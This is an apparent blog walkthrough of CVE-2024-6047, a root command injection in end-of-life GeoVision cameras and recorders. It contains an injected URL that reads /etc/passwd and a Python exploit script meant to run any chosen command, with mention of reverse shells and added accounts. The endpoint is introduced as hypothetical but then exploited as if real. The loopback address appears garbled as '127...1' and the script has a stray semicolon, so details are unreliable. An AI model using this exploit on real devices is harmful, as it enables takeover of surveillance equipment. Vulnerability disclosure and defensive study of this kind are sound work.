CVE-2024-6047 - Unauthenticated Command Injection in EOL GeoVision Devices - Analysis and Exploit Walkthrough

GeoVision is a well-known provider of video surveillance equipment and software. However, just because a device is popular doesn’t always mean it’s secure. In fact, many Internet-connected cameras and recorders go out of support, but remain widely deployed—and dangerously vulnerable.

One recent discovery is CVE-2024-6047, a critical issue affecting specific end-of-life (EOL) GeoVision devices. In this post, I’ll break down how this vulnerability works, how attackers can exploit it, and what you can do if your organization is still running these devices.

What Is CVE-2024-6047?

CVE-2024-6047 is a command injection vulnerability found in certain EOL GeoVision devices. The vulnerability occurs because the firmware fails to properly filter or validate user input before using it in system-level commands. This means attackers can send specially crafted data to the vulnerable functionality, and the device may run attacker-chosen commands as the root user.

Vulnerable Functionality

Most IoT cameras have web interfaces for configuration. In the vulnerable GeoVision models, an HTTP API responsible for things like system configuration and diagnostics fails to sanitize input it receives. Parameters sent in the request are directly passed to system calls, opening the door to command injection.

For example, a classic vulnerable code pattern in C-like pseudo code might look like this

char cmd[256];
snprintf(cmd, sizeof(cmd), "ping %s", request->query_param);
system(cmd); // Dangerous: unsanitized user input

If the software does not restrict what gets put into cmd, an attacker can inject additional shell commands.

Let’s say the web interface has a debug endpoint like

http://camera-ip/cgi-bin/ping.cgi?host=127...1

But it doesn’t sanitize the host parameter. An attacker could make a request like

http://camera-ip/cgi-bin/ping.cgi?host=127...1;cat /etc/passwd

This would result in the device executing

ping 127...1;cat /etc/passwd

The output would include the contents of /etc/passwd.

Exploit Example

Below is a simple Python script that demonstrates this unauthenticated exploit. (Note: Do not use this on devices you don't own or have permission to test.)

import requests

TARGET_IP = "192.168.1.100"
COMMAND = "cat /etc/passwd"  # Example command

# Craft payload with command injection
payload = "127...1;" + COMMAND

url = f"http://{TARGET_IP}/cgi-bin/ping.cgi";
params = {"host": payload}

# Send the malicious request
resp = requests.get(url, params=params)
print(resp.text)  # Output from the injected command

Replace cat /etc/passwd with any command you want to execute on the target. With this vulnerability, you can escalate further, drop a reverse shell, or add your own accounts.

Who’s At Risk?

- Organizations using older GeoVision DVRs, NVRs, or cameras—especially if they’ve exposed them to the Internet.
- Anyone unaware that their devices have reached EOL status and are no longer receiving security updates.

Remediation and Mitigation

*GeoVision has discontinued these devices and will NOT be providing patches.*

References and Further Reading

- Official GeoVision Support: https://www.geovision.com.tw/support
- Device EOL List: GeoVision EOL Products.pdf
- CVE Entry: NIST NVD - CVE-2024-6047
- Rapid7 IoT Security Guide

Conclusion

CVE-2024-6047 serves as a sharp reminder that end-of-life gear—especially when exposed to the Internet—becomes a playground for attackers. If you’re running aging GeoVision equipment, it’s time to take inventory and move to safer ground. Vulnerabilities in products like these will only get worse with time, not better.

Stay safe, decommission those old cameras, and keep your network secure!

Timeline

Published on: 06/17/2024 06:15:09 UTC
Last modified on: 08/01/2024 22:15:39 UTC